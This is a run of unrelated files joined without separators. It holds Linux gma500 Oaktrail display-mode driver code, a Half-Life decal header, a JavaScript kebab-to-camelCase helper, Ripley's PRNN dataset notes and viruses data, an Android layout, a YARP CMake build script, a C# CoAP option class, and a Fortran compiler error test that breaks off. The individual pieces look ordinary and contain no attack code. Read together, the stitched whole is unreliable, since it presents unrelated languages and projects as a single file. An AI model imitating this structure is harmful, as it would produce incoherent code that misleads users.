* Return the pipe currently connected to the panel fitter,
* or -1 if the panel fitter is not present or not in use
*/
static int oaktrail_panel_fitter_pipe(struct drm_device *dev)
{
u32 pfit_control;
pfit_control = REG_READ(PFIT_CONTROL);
/* See if the panel fitter is in use */
if ((pfit_control & PFIT_ENABLE) == 0)
return -1;
return (pfit_control >> 29) & 3;
}
static int oaktrail_crtc_mode_set(struct drm_crtc *crtc,
struct drm_display_mode *mode,
struct drm_display_mode *adjusted_mode,
int x, int y,
struct drm_framebuffer *old_fb)
{
struct drm_device *dev = crtc->dev;
struct gma_crtc *gma_crtc = to_gma_crtc(crtc);
struct drm_psb_private *dev_priv = dev->dev_private;
int pipe = gma_crtc->pipe;
const struct psb_offset *map = &dev_priv->regmap[pipe];
int refclk = 0;
struct gma_clock_t clock;
const struct gma_limit_t *limit;
u32 dpll = 0, fp = 0, dspcntr, pipeconf;
bool ok, is_sdvo = false;
bool is_lvds = false;
bool is_mipi = false;
struct drm_mode_config *mode_config = &dev->mode_config;
struct gma_encoder *gma_encoder = NULL;
uint64_t scalingType = DRM_MODE_SCALE_FULLSCREEN;
struct drm_connector *connector;
int i;
int need_aux = gma_pipe_has_type(crtc, INTEL_OUTPUT_SDVO) ? 1 : 0;
if (gma_pipe_has_type(crtc, INTEL_OUTPUT_HDMI))
return oaktrail_crtc_hdmi_mode_set(crtc, mode, adjusted_mode, x, y, old_fb);
if (!gma_power_begin(dev, true))
return 0;
memcpy(&gma_crtc->saved_mode,
mode,
sizeof(struct drm_display_mode));
memcpy(&gma_crtc->saved_adjusted_mode,
adjusted_mode,
sizeof(struct drm_display_mode));
list_for_each_entry(connector, &mode_config->connector_list, head) {
if (!connector->encoder || connector->encoder->crtc != crtc)
continue;
gma_encoder = gma_attached_encoder(connector);
switch (gma_encoder->type) {
case INTEL_OUTPUT_LVDS:
is_lvds = true;
break;
case INTEL_OUTPUT_SDVO:
is_sdvo = true;
break;
case INTEL_OUTPUT_MIPI:
is_mipi = true;
break;
}
}
/* Disable the VGA plane that we never use */
for (i = 0; i <= need_aux; i++)
REG_WRITE_WITH_AUX(VGACNTRL, VGA_DISP_DISABLE, i);
/* Disable the panel fitter if it was on our pipe */
if (oaktrail_panel_fitter_pipe(dev) == pipe)
REG_WRITE(PFIT_CONTROL, 0);
for (i = 0; i <= need_aux; i++) {
REG_WRITE_WITH_AUX(map->src, ((mode->crtc_hdisplay - 1) << 16) |
(mode->crtc_vdisplay - 1), i);
}
if (gma_encoder)
drm_object_property_get_value(&connector->base,
dev->mode_config.scaling_mode_property, &scalingType);
if (scalingType == DRM_MODE_SCALE_NO_SCALE) {
/* Moorestown doesn't have register support for centering so
* we need to mess with the h/vblank and h/vsync start and
* ends to get centering */
int offsetX = 0, offsetY = 0;
offsetX = (adjusted_mode->crtc_hdisplay -
mode->crtc_hdisplay) / 2;
offsetY = (adjusted_mode->crtc_vdisplay -
mode->crtc_vdisplay) / 2;
for (i = 0; i <= need_aux; i++) {
REG_WRITE_WITH_AUX(map->htotal, (mode->crtc_hdisplay - 1) |
((adjusted_mode->crtc_htotal - 1) << 16), i);
REG_WRITE_WITH_AUX(map->vtotal, (mode->crtc_vdisplay - 1) |
((adjusted_mode->crtc_vtotal - 1) << 16), i);
REG_WRITE_WITH_AUX(map->hblank,
(adjusted_mode->crtc_hblank_start - offsetX - 1) |
((adjusted_mode->crtc_hblank_end - offsetX - 1) << 16), i);
REG_WRITE_WITH_AUX(map->hsync,
(adjusted_mode->crtc_hsync_start - offsetX - 1) |
((adjusted_mode->crtc_hsync_end - offsetX - 1) << 16), i);
REG_WRITE_WITH_AUX(map->vblank,
(adjusted_mode->crtc_vblank_start - offsetY - 1) |
((adjusted_mode->crtc_vblank_end - offsetY - 1) << 16), i);
REG_WRITE_WITH_AUX(map->vsync,
(adjusted_mode->crtc_vsync_start - offsetY - 1) |
((adjusted_mode->crtc_vsync_end - offsetY - 1) << 16), i);
}
} else {
for (i = 0; i <= need_aux; i++) {
REG_WRITE_WITH_AUX(map->htotal, (adjusted_mode->crtc_hdisplay - 1) |
((adjusted_mode->crtc_htotal - 1) << 16), i);
REG_WRITE_WITH_AUX(map->vtotal, (adjusted_mode->crtc_vdisplay - 1) |
((adjusted_mode->crtc_vtotal - 1) << 16), i);
REG_WRITE_WITH_AUX(map->hblank, (adjusted_mode->crtc_hblank_start - 1) |
((adjusted_mode->crtc_hblank_end - 1) << 16), i);
REG_WRITE_WITH_AUX(map->hsync, (adjusted_mode->crtc_hsync_start - 1) |
((adjusted_mode->crtc_hsync_end - 1) << 16), i);
REG_WRITE_WITH_AUX(map->vblank, (adjusted_mode->crtc_vblank_start - 1) |
((adjusted_mode->crtc_vblank_end - 1) << 16), i);
REG_WRITE_WITH_AUX(map->vsync, (adjusted_mode->crtc_vsync_start - 1) |
((adjusted_mode->crtc_vsync_end - 1) << 16), i);
}
}
/* Flush the plane changes */
{
const struct drm_crtc_helper_funcs *crtc_funcs =
crtc->helper_private;
crtc_funcs->mode_set_base(crtc, x, y, old_fb);
}
/* setup pipeconf */
pipeconf = REG_READ(map->conf);
/* Set up the display plane register */
dspcntr = REG_READ(map->cntr);
dspcntr |= DISPPLANE_GAMMA_ENABLE;
if (pipe == 0)
dspcntr |= DISPPLANE_SEL_PIPE_A;
else
dspcntr |= DISPPLANE_SEL_PIPE_B;
if (is_mipi)
goto oaktrail_crtc_mode_set_exit;
dpll = 0; /*BIT16 = 0 for 100MHz reference */
refclk = is_sdvo ? 96000 : dev_priv->core_freq * 1000;
limit = mrst_limit(crtc, refclk);
ok = limit->find_pll(limit, crtc, adjusted_mode->clock,
refclk, &clock);
if (is_sdvo) {
/* Convert calculated values to register values */
clock.p1 = (1L << (clock.p1 - 1));
clock.m -= 2;
clock.n = (1L << (clock.n - 1));
}
if (!ok)
DRM_ERROR("Failed to find proper PLL settings");
mrst_print_pll(&clock);
if (is_sdvo)
fp = clock.n << 16 | clock.m;
else
fp = oaktrail_m_converts[(clock.m - MRST_M_MIN)] << 8;
dpll |= DPLL_VGA_MODE_DIS;
dpll |= DPLL_VCO_ENABLE;
if (is_lvds)
dpll |= DPLLA_MODE_LVDS;
else
dpll |= DPLLB_MODE_DAC_SERIAL;
if (is_sdvo) {
int sdvo_pixel_multiply =
adjusted_mode->clock / mode->clock;
dpll |= DPLL_DVO_HIGH_SPEED;
dpll |=
(sdvo_pixel_multiply -
1) << SDVO_MULTIPLIER_SHIFT_HIRES;
}
/* compute bitmask from p1 value */
if (is_sdvo)
dpll |= clock.p1 << 16; // dpll |= (1 << (clock.p1 - 1)) << 16;
else
dpll |= (1 << (clock.p1 - 2)) << 17;
dpll |= DPLL_VCO_ENABLE;
if (dpll & DPLL_VCO_ENABLE) {
for (i = 0; i <= need_aux; i++) {
REG_WRITE_WITH_AUX(map->fp0, fp, i);
REG_WRITE_WITH_AUX(map->dpll, dpll & ~DPLL_VCO_ENABLE, i);
REG_READ_WITH_AUX(map->dpll, i);
/* Check the DPLLA lock bit PIPEACONF[29] */
udelay(150);
}
}
for (i = 0; i <= need_aux; i++) {
REG_WRITE_WITH_AUX(map->fp0, fp, i);
REG_WRITE_WITH_AUX(map->dpll, dpll, i);
REG_READ_WITH_AUX(map->dpll, i);
/* Wait for the clocks to stabilize. */
udelay(150);
/* write it again -- the BIOS does, after all */
REG_WRITE_WITH_AUX(map->dpll, dpll, i);
REG_READ_WITH_AUX(map->dpll, i);
/* Wait for the clocks to stabilize. */
udelay(150);
REG_WRITE_WITH_AUX(map->conf, pipeconf, i);
REG_READ_WITH_AUX(map->conf, i);
gma_wait_for_vblank(dev);
REG_WRITE_WITH_AUX(map->cntr, dspcntr, i);
gma_wait_for_vblank(dev);
}
oaktrail_crtc_mode_set_exit:
gma_power_end(dev);
return 0;
}
static int oaktrail_pipe_set_base(struct drm_crtc *crtc,
int x, int y, struct drm_framebuffer *old_fb)
{
struct drm_device *dev = crtc->dev;
struct drm_psb_private *dev_priv = dev->dev_private;
struct gma_crtc *gma_crtc = to_gma_crtc(crtc);
struct drm_framebuffer *fb = crtc->primary->fb;
int pipe = gma_crtc->pipe;
const struct psb_offset *map = &dev_priv->regmap[pipe];
unsigned long start, offset;
u32 dspcntr;
int ret = 0;
/* no fb bound */
if (!fb) {
dev_dbg(dev->dev, "No FB bound\n");
return 0;
}
if (!gma_power_begin(dev, true))
return 0;
start = to_gtt_range(fb->obj[0])->offset;
offset = y * fb->pitches[0] + x * fb->format->cpp[0];
REG_WRITE(map->stride, fb->pitches[0]);
dspcntr = REG_READ(map->cntr);
dspcntr &= ~DISPPLANE_PIXFORMAT_MASK;
switch (fb->format->cpp[0] * 8) {
case 8:
dspcntr |= DISPPLANE_8BPP;
break;
case 16:
if (fb->format->depth == 15)
dspcntr |= DISPPLANE_15_16BPP;
else
dspcntr |= DISPPLANE_16BPP;
break;
case 24:
case 32:
dspcntr |= DISPPLANE_32BPP_NO_ALPHA;
break;
default:
dev_err(dev->dev, "Unknown color depth\n");
ret = -EINVAL;
goto pipe_set_base_exit;
}
REG_WRITE(map->cntr, dspcntr);
REG_WRITE(map->base, offset);
REG_READ(map->base);
REG_WRITE(map->surf, start);
REG_READ(map->surf);
pipe_set_base_exit:
gma_power_end(dev);
return ret;
}
const struct drm_crtc_helper_funcs oaktrail_helper_funcs = {
.dpms = oaktrail_crtc_dpms,
.mode_set = oaktrail_crtc_mode_set,
.mode_set_base = oaktrail_pipe_set_base,
.prepare = gma_crtc_prepare,
.commit = gma_crtc_commit,
};
/* Not used yet */
const struct gma_clock_funcs mrst_clock_funcs = {
.clock = mrst_lvds_clock,
.limit = mrst_limit,
.pll_is_valid = gma_pll_is_valid,
};
/*
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at
* your option) any later version.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
* In addition, as a special exception, the author gives permission to
* link the code of this program with the Half-Life Game Engine ("HL
* Engine") and Modified Game Libraries ("MODs") developed by Valve,
* L.L.C ("Valve"). You must obey the GNU General Public License in all
* respects for all of the code used other than the HL Engine and MODs
* from Valve. If you modify this file, you may extend this exception
* to your version of the file, but you are not obligated to do so. If
* you do not wish to do so, delete this exception statement from your
* version.
*
*/
#pragma once
#define DEFINE_DECAL(name)\
{ name, 0 }
enum decal_e
{
DECAL_GUNSHOT1 = 0,
DECAL_GUNSHOT2,
DECAL_GUNSHOT3,
DECAL_GUNSHOT4,
DECAL_GUNSHOT5,
DECAL_LAMBDA1,
DECAL_LAMBDA2,
DECAL_LAMBDA3,
DECAL_LAMBDA4,
DECAL_LAMBDA5,
DECAL_LAMBDA6,
DECAL_SCORCH1,
DECAL_SCORCH2,
DECAL_BLOOD1,
DECAL_BLOOD2,
DECAL_BLOOD3,
DECAL_BLOOD4,
DECAL_BLOOD5,
DECAL_BLOOD6,
DECAL_YBLOOD1,
DECAL_YBLOOD2,
DECAL_YBLOOD3,
DECAL_YBLOOD4,
DECAL_YBLOOD5,
DECAL_YBLOOD6,
DECAL_GLASSBREAK1,
DECAL_GLASSBREAK2,
DECAL_GLASSBREAK3,
DECAL_BIGSHOT1,
DECAL_BIGSHOT2,
DECAL_BIGSHOT3,
DECAL_BIGSHOT4,
DECAL_BIGSHOT5,
DECAL_SPIT1,
DECAL_SPIT2,
DECAL_BPROOF1, // Bulletproof glass decal
DECAL_GARGSTOMP1, // Gargantua stomp crack
DECAL_SMALLSCORCH1, // Small scorch mark
DECAL_SMALLSCORCH2, // Small scorch mark
DECAL_SMALLSCORCH3, // Small scorch mark
DECAL_MOMMABIRTH, // Big momma birth splatter
DECAL_MOMMASPLAT,
DECAL_END
};
typedef struct
{
char *name;
int index;
} DLL_DECALLIST;
extern DLL_DECALLIST gDecals[DECAL_END];
define(function() {
/**
* cssToDOM takes a kebab-case string and converts it to camelCase
* e.g. box-sizing -> boxSizing
*
* @access private
* @function cssToDOM
* @param {string} name - String name of kebab-case prop we want to convert
* @returns {string} The camelCase version of the supplied name
*/
function cssToDOM(name) {
return name.replace(/([a-z])-([a-z])/g, function(str, m1, m2) {
return m1 + m2.toUpperCase();
}).replace(/^-/, '');
}
return cssToDOM;
});
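The same transform, lifted out of the AMD wrapper so its behavior can be checked standalone (the function body is copied verbatim from the module above):

```javascript
// Standalone copy of cssToDOM, identical regexes to the module above:
// camelCase each letter-hyphen-letter pair, then strip a leading '-'.
function cssToDOM(name) {
  return name.replace(/([a-z])-([a-z])/g, function (str, m1, m2) {
    return m1 + m2.toUpperCase();
  }).replace(/^-/, '');
}

console.log(cssToDOM('box-sizing'));         // boxSizing
console.log(cssToDOM('-webkit-transform'));  // webkitTransform
```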
% Datasets for `Pattern Recognition and Neural Networks' by B.D. Ripley
% =====================================================================
%
% Cambridge University Press (1996) ISBN 0-521-46086-7
%
% The background to the datasets is described in section 1.4; this file
% relates the computer-readable files to that description.
%
%
%
% Cushing's syndrome
% ------------------
%
% Data from Aitchison & Dunsmore (1975, Tables 11.1-3).
%
% Data file Cushings.dat has four columns,
%
% Label of the patient
% Tetrahydrocortisone (mg/24hr)
% Pregnanetriol (mg/24hr)
% Type
%
% The type of the last six patients (u1 to u6) should be
% regarded as unknown. (The code `o' indicates `other').
%
%
%
% synthetic two-class problem
% ---------------------------
%
% Data from Ripley (1994a).
%
% This has two real-valued co-ordinates (xs and ys) and a class (xc)
% which is 0 or 1.
%
% Data file synth.tr has 250 rows of the training set
% synth.te has 1000 rows of the test set (not used here)
%
%
%
% viruses
% -------
%
% This is a dataset on 61 viruses with rod-shaped particles affecting
% various crops (tobacco, tomato, cucumber and others) described by
% Fauquet et al. (1988) and analysed by Eslava-G\'omez (1989). There
% are 18 measurements on each virus, the number of amino acid residues
% per molecule of coat protein.
%
% Data file viruses.dat has 61 rows of 18 counts
% virus3.dat has 38 rows corresponding to the distinct
% Tobamoviruses.
%
% The whole dataset is in order Hordeviruses (3), Tobraviruses (6),
% Tobamoviruses (39) and `furoviruses' (13).
%
%
%
% Leptograpsus crabs
% ------------------
%
% Data from Campbell & Mahon (1974) on the morphology of rock crabs of
% genus Leptograpsus.
%
% There are 50 specimens of each sex of each of two colour forms.
%
% Data file crabs.dat has rows
%
% sp `species', coded B (blue form) or O (orange form)
% sex coded M or F
% index within each group of 50
% FL frontal lip of carapace (mm)
% RW rear width of carapace (mm)
% CL length along the midline of carapace (mm)
% CW maximum width of carapace (mm)
% BD body depth (mm)
%
%
%
% Forensic glass
% --------------
%
% This example comes from forensic testing of glass collected by
% B. German on 214 fragments of glass. It is also contained in the
% UCI machine-learning database collection (Murphy & Aha, 1995).
%
% Data file fglass.dat has 214 rows with data for a single glass
% fragment.
%
% RI refractive index
% Na % weight of sodium oxide(s)
% Mg % weight of magnesium oxide(s)
% Al % weight of aluminium oxide(s)
% Si % weight of silicon oxide(s)
% K % weight of potassium oxide(s)
% Ca % weight of calcium oxide(s)
% Ba % weight of barium oxide(s)
% Fe % weight of iron oxide(s)
% type coded 1 to 7
%
% The type codes are:
%
% 1 (WinF) window float glass
% 2 (WinNF) window non-float glass
% 3 (Veh) vehicle glass
% 5 (Con) containers
% 6 (Tabl) tableware
% 7 (Head) vehicle headlamp glass
%
% The ten groups used for the cross-validation experiments (I believe)
% are listed as row numbers in the file fglass.grp.
%
%
%
% Diabetes in Pima Indians
% ------------------------
%
% A population of women who were at least 21 years old, of Pima Indian heritage
% and living near Phoenix, Arizona, was tested for diabetes
% according to World Health Organization criteria. The data
% were collected by the US National Institute of Diabetes and Digestive and
% Kidney Diseases (Smith et al, 1988). This example is also contained in the
% UCI machine-learning database collection (Murphy & Aha, 1995).
%
% The data files have rows containing
%
% npreg number of pregnancies
% glu plasma glucose concentration in an oral glucose tolerance test
% bp diastolic blood pressure (mm Hg)
% skin triceps skin fold thickness (mm)
% ins serum insulin (micro U/ml)
% bmi body mass index (weight in kg/(height in m)^2)
% ped diabetes pedigree function
% age in years
% type No / Yes
%
% Data file pima.tr has 200 rows of complete training data.
% pima.te has 332 rows of complete test data.
% pima.tr2 has the 200 rows of pima.tr plus 100 incomplete rows.
%
%
% Note: there was no column information in the data, hence the names
% were generated automatically
%
%
% Information about the dataset
% CLASSTYPE: nominal
% CLASSINDEX: none specific
%
@relation prnn-viruses
@attribute col_1 INTEGER
@attribute col_2 INTEGER
@attribute col_3 INTEGER
@attribute col_4 INTEGER
@attribute col_5 INTEGER
@attribute col_6 INTEGER
@attribute col_7 INTEGER
@attribute col_8 {0,1,2,3}
@attribute col_9 INTEGER
@attribute col_10 {0,1,2,3,4,7}
@attribute col_11 {3,4,5,6,7,8,9,10,11}
@attribute col_12 {11,12,13,14,15,16,17,18,19,21}
@attribute col_13 {4,5,6,7,8,9,12,15}
@attribute col_14 {4,5,6,7,8,9,10,11,12,14}
@attribute col_15 {0,1,2,3,4,5,6}
@attribute col_16 INTEGER
@attribute col_17 INTEGER
@attribute col_18 {0,1,2,3,4,5}
@data
25,9,9,19,12,8,20,0,10,0,6,21,8,7,4,7,17,5
26,9,9,20,13,8,20,0,10,0,6,21,8,7,4,7,17,5
25,9,9,22,10,10,23,0,13,0,6,19,5,6,4,8,16,5
15,10,21,13,18,12,22,1,9,2,4,11,5,10,1,14,8,2
17,11,22,15,14,10,23,1,11,2,4,11,5,9,1,13,9,1
22,17,17,16,10,15,13,1,7,2,3,14,9,9,2,12,6,2
21,18,18,15,11,15,16,1,7,2,3,14,6,8,2,12,7,2
20,9,16,15,16,6,19,1,7,3,4,14,4,11,1,16,11,3
22,10,17,18,13,6,21,1,8,3,4,13,4,11,1,15,10,3
17,13,14,16,4,9,14,1,13,0,11,13,5,7,1,4,11,5
12,11,9,12,6,5,12,1,9,1,7,12,5,6,0,4,8,2
18,16,16,16,8,6,14,1,14,0,9,12,4,8,0,2,11,3
18,16,15,19,8,6,11,1,15,1,7,13,5,8,0,2,9,3
17,13,13,22,8,4,18,1,10,3,8,11,7,6,1,2,10,2
16,13,16,21,9,3,17,1,10,4,7,12,7,5,1,2,11,3
22,19,10,16,10,4,18,1,12,2,8,11,6,8,0,1,8,2
20,10,24,10,6,9,21,0,7,0,7,18,4,9,1,4,8,2
20,21,12,15,9,7,11,1,9,3,8,14,6,7,0,1,10,3
20,21,12,15,9,7,11,1,9,3,9,14,5,7,0,1,10,3
18,11,24,10,9,6,19,0,12,0,7,14,4,11,0,4,9,1
20,12,23,10,8,5,20,0,13,0,6,13,4,11,0,4,10,1
18,19,18,16,8,4,12,0,12,0,10,15,8,6,1,1,12,1
17,16,17,15,8,6,14,1,14,0,9,12,4,8,0,3,11,3
19,17,14,16,8,6,14,1,14,0,8,12,4,8,0,2,12,3
19,17,15,16,8,5,14,1,14,0,8,12,4,8,0,2,12,3
19,15,16,16,8,6,14,1,15,0,8,12,4,8,0,2,12,3
17,17,16,19,8,6,11,1,15,1,7,13,5,8,0,2,9,3
18,17,15,19,8,6,11,1,15,1,7,13,5,8,0,2,9,3
22,19,10,16,10,4,18,1,12,2,8,11,6,8,0,1,8,2
22,19,10,16,10,5,17,1,12,2,8,11,6,8,0,1,8,2
18,20,10,18,6,8,17,1,14,1,5,16,4,7,0,2,9,2
18,16,16,15,8,6,13,1,14,1,8,12,4,8,1,2,12,3
20,21,12,15,9,7,11,1,10,3,8,14,7,7,0,1,9,3
20,21,12,15,9,7,11,1,10,3,9,14,5,7,0,1,10,3
18,12,23,10,9,5,20,0,14,0,7,12,4,11,0,4,10,1
18,12,21,10,10,5,18,0,13,0,8,12,4,12,0,4,10,1
17,12,22,10,8,5,18,0,14,0,5,13,4,10,0,3,9,1
17,16,16,16,8,6,15,1,14,0,9,12,4,8,0,2,11,3
19,17,15,17,7,6,15,1,14,0,8,12,4,8,0,2,10,3
18,16,16,19,8,6,11,1,15,1,7,13,5,8,0,2,9,3
18,17,15,17,8,6,15,1,14,0,8,12,4,8,0,3,9,3
15,12,14,23,8,3,17,1,9,4,7,15,6,6,1,2,11,2
13,11,14,22,7,3,17,1,10,4,8,13,6,6,1,3,11,2
16,11,15,23,10,4,18,1,10,3,7,12,6,5,1,2,9,3
14,11,14,25,11,3,19,2,10,2,7,12,6,5,1,2,9,3
11,11,15,24,10,5,18,1,11,1,7,14,5,7,2,3,11,2
15,9,12,21,8,4,21,1,10,3,7,15,7,6,1,3,10,3
15,11,15,22,7,3,19,1,8,3,4,14,6,5,1,2,10,2
27,8,13,25,12,26,21,1,20,0,11,18,5,7,5,7,19,3
27,8,13,25,13,27,21,1,19,0,11,18,6,8,5,7,19,3
27,7,12,25,12,26,21,1,20,0,11,17,6,8,5,7,19,3
26,8,13,25,13,26,21,1,19,0,11,18,6,8,5,8,19,3
28,6,13,24,12,30,22,1,18,0,11,18,6,8,4,7,19,3
27,8,14,25,13,26,21,1,18,0,11,18,6,8,5,7,19,3
24,15,18,14,10,14,19,1,14,7,5,19,4,6,2,12,10,4
25,14,15,15,9,12,14,0,8,3,6,12,4,14,1,10,8,0
29,11,12,23,9,15,23,0,16,1,10,13,5,8,3,6,23,5
28,15,22,21,7,32,21,1,13,2,8,16,12,5,5,8,9,1
29,14,22,20,9,20,20,2,15,2,9,16,7,6,6,10,13,2
29,16,18,18,8,32,22,1,14,2,9,18,15,4,4,8,9,1
31,14,21,20,9,21,20,3,15,2,8,17,6,7,6,10,13,1
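The group ordering stated in the comments above (3 Hordeiviruses, 6 Tobraviruses, 39 Tobamoviruses, 13 'furoviruses') can be turned into row-index ranges for slicing viruses.dat. A small sketch, assuming the rows keep that documented order:

```python
def group_ranges(sizes):
    """Map group name -> (start, stop) half-open row range,
    accumulating the documented group sizes in order."""
    ranges, start = {}, 0
    for name, n in sizes:
        ranges[name] = (start, start + n)
        start += n
    return ranges

groups = group_ranges([("Hordeivirus", 3), ("Tobravirus", 6),
                       ("Tobamovirus", 39), ("furovirus", 13)])
print(groups["Tobamovirus"])                   # (9, 48)
print(sum(b - a for a, b in groups.values()))  # 61 rows in total
```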
<?xml version="1.0" encoding="utf-8"?>
<FrameLayout xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
android:id="@+id/container"
android:layout_width="match_parent"
android:layout_height="match_parent"
tools:context=".MainActivity" />
# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
from .data import DataIngestion
__all__ = ['DataIngestion']
# Copyright (C) 2006-2020 Istituto Italiano di Tecnologia (IIT)
# All rights reserved.
#
# This software may be modified and distributed under the terms of the
# BSD-3-Clause license. See the accompanying LICENSE file for details.
# FIXME All API should use a YARP_manager_API for __declspec(dllimport/dllexport)
# For now always build the library as STATIC
add_library(YARP_manager STATIC)
add_library(YARP::YARP_manager ALIAS YARP_manager)
set(YARP_manager_HDRS yarp/manager/application.h
yarp/manager/arbitrator.h
yarp/manager/binexparser.h
yarp/manager/broker.h
yarp/manager/data.h
yarp/manager/execstate.h
yarp/manager/executable.h
yarp/manager/fsm.h
yarp/manager/graph.h
yarp/manager/kbase.h
yarp/manager/localbroker.h
yarp/manager/logicresource.h
yarp/manager/manager.h
yarp/manager/manifestloader.h
yarp/manager/module.h
yarp/manager/node.h
yarp/manager/physicresource.h
yarp/manager/primresource.h
yarp/manager/resource.h
yarp/manager/scriptbroker.h
yarp/manager/singleapploader.h
yarp/manager/utility.h
yarp/manager/xmlapploader.h
yarp/manager/xmlclusterloader.h
yarp/manager/xmlappsaver.h
yarp/manager/xmlmodloader.h
yarp/manager/xmlresloader.h
yarp/manager/xmltemploader.h
yarp/manager/yarpbroker.h
yarp/manager/yarpdevbroker.h
yarp/manager/ymm-types.h)
set(YARP_manager_IMPL_HDRS yarp/manager/impl/textparser.h)
set(YARP_manager_SRCS yarp/manager/application.cpp
yarp/manager/arbitrator.cpp
yarp/manager/binexparser.cpp
yarp/manager/broker.cpp
yarp/manager/data.cpp
yarp/manager/execstate.cpp
yarp/manager/executable.cpp
yarp/manager/graph.cpp
yarp/manager/kbase.cpp
yarp/manager/localbroker.cpp
yarp/manager/logicresource.cpp
yarp/manager/manager.cpp
yarp/manager/module.cpp
yarp/manager/node.cpp
yarp/manager/physicresource.cpp
yarp/manager/primresource.cpp
yarp/manager/resource.cpp
yarp/manager/scriptbroker.cpp
yarp/manager/singleapploader.cpp
yarp/manager/utility.cpp
yarp/manager/xmlapploader.cpp
yarp/manager/xmlclusterloader.cpp
yarp/manager/xmlappsaver.cpp
yarp/manager/xmlmodloader.cpp
yarp/manager/xmlresloader.cpp
yarp/manager/xmltemploader.cpp
yarp/manager/yarpbroker.cpp)
source_group(TREE "${CMAKE_CURRENT_SOURCE_DIR}"
PREFIX "Source Files"
FILES ${YARP_manager_SRCS})
source_group(TREE "${CMAKE_CURRENT_SOURCE_DIR}"
PREFIX "Header Files"
FILES ${YARP_manager_HDRS}
${YARP_manager_IMPL_HDRS})
target_sources(YARP_manager PRIVATE ${YARP_manager_SRCS}
${YARP_manager_HDRS}
${YARP_manager_IMPL_HDRS})
target_include_directories(YARP_manager PUBLIC $<BUILD_INTERFACE:${CMAKE_CURRENT_SOURCE_DIR}>
$<INSTALL_INTERFACE:${CMAKE_INSTALL_INCLUDEDIR}>)
if(MSVC)
target_include_directories(YARP_manager SYSTEM PRIVATE ${dirent_INCLUDE_DIRS})
endif()
target_compile_features(YARP_manager PUBLIC cxx_std_14)
target_link_libraries(YARP_manager PUBLIC YARP::YARP_os
PRIVATE YARP::YARP_sig)
list(APPEND YARP_manager_PUBLIC_DEPS YARP_os)
list(APPEND YARP_manager_PRIVATE_DEPS YARP_sig)
if(TARGET YARP::YARP_math)
target_link_libraries(YARP_manager PRIVATE YARP::YARP_math)
target_compile_definitions(YARP_manager PRIVATE WITH_YARPMATH)
list(APPEND YARP_manager_PRIVATE_DEPS YARP_math)
endif()
target_include_directories(YARP_manager SYSTEM PRIVATE ${TinyXML_INCLUDE_DIRS})
target_link_libraries(YARP_manager PRIVATE ${TinyXML_LIBRARIES})
list(APPEND YARP_manager_PRIVATE_DEPS TinyXML)
set_property(TARGET YARP_manager PROPERTY PUBLIC_HEADER ${YARP_manager_HDRS})
set_property(TARGET YARP_manager PROPERTY PRIVATE_HEADER ${YARP_manager_IMPL_HDRS})
set_property(TARGET YARP_manager PROPERTY VERSION ${YARP_VERSION_SHORT})
set_property(TARGET YARP_manager PROPERTY SOVERSION ${YARP_SOVERSION})
set_property(TARGET YARP_manager PROPERTY FOLDER "Libraries/Private")
install(TARGETS YARP_manager
EXPORT YARP_manager
RUNTIME
DESTINATION "${CMAKE_INSTALL_BINDIR}"
COMPONENT YARP_manager
LIBRARY
DESTINATION "${CMAKE_INSTALL_LIBDIR}"
COMPONENT YARP_manager
NAMELINK_COMPONENT YARP_manager-dev
ARCHIVE
DESTINATION "${CMAKE_INSTALL_LIBDIR}"
COMPONENT YARP_manager-dev
PUBLIC_HEADER
DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}/yarp/manager"
COMPONENT YARP_manager-dev
PRIVATE_HEADER
DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}/yarp/manager/impl"
COMPONENT YARP_manager-priv-dev)
set(YARP_manager_PUBLIC_DEPS ${YARP_manager_PUBLIC_DEPS} PARENT_SCOPE)
set(YARP_manager_PRIVATE_DEPS ${YARP_manager_PRIVATE_DEPS} PARENT_SCOPE)
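The structure above, an empty STATIC library declared first, given a namespaced ALIAS, and populated later with `target_sources`, reduces to a small hypothetical skeleton. The library name and file paths below are placeholders:

```cmake
# Minimal sketch of the add_library(STATIC) + ALIAS + target_sources
# pattern; 'mylib' and the source paths are illustrative only.
cmake_minimum_required(VERSION 3.11) # 3.11+ allows add_library with no sources
project(sketch CXX)

add_library(mylib STATIC)          # declare the target first
add_library(My::mylib ALIAS mylib) # consumers link against My::mylib

target_sources(mylib PRIVATE src/mylib.cpp include/mylib.h)
target_include_directories(mylib
  PUBLIC $<BUILD_INTERFACE:${CMAKE_CURRENT_SOURCE_DIR}/include>
         $<INSTALL_INTERFACE:include>)
target_compile_features(mylib PUBLIC cxx_std_14)
```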
using System;
using Waher.Security;
namespace Waher.Networking.CoAP.Options
{
/// <summary>
/// Base class for all opaque CoAP options.
/// </summary>
public abstract class CoapOptionOpaque : CoapOption
{
private byte[] value;
/// <summary>
/// Base class for all opaque CoAP options.
/// </summary>
public CoapOptionOpaque()
: base()
{
}
/// <summary>
/// Base class for all opaque CoAP options.
/// </summary>
/// <param name="Value">Opaque option value.</param>
public CoapOptionOpaque(byte[] Value)
{
this.value = Value;
}
/// <summary>
/// Gets the option value.
/// </summary>
/// <returns>Binary value. Can be null, if option does not have a value.</returns>
public override byte[] GetValue()
{
return this.value;
}
/// <summary>
/// <see cref="object.ToString()"/>
/// </summary>
public override string ToString()
{
return base.ToString() + " = " + Hashes.BinaryToString(this.value);
}
}
}
! RUN: %S/test_errors.sh %s %t %f18
! Extended derived types
module m1
type :: t1
integer :: x
!ERROR: Component 'x' is already declared in this derived type
real :: x
end type
end
module m2
type :: t1
integer :: i
end type
type, extends(t1) :: t2
!ERROR: Component 'i' is already declared in a parent of this derived type
integer :: i
end type
end
module m3
type :: t1
end type
type, extends(t1) :: t2
integer :: i
!ERROR: 't1' is a parent type of this type and so cannot be a component
real :: t1
end type
type :: t3
end type
type, extends(t3) :: t4
end type
type, extends(t4) :: t5
!ERROR: 't3' is a parent type of this type and so cannot be a component
real :: t3
end type
end
module m4
type :: t1
integer :: t1
end type
!ERROR: Type cannot be extended as it has a component named 't1'
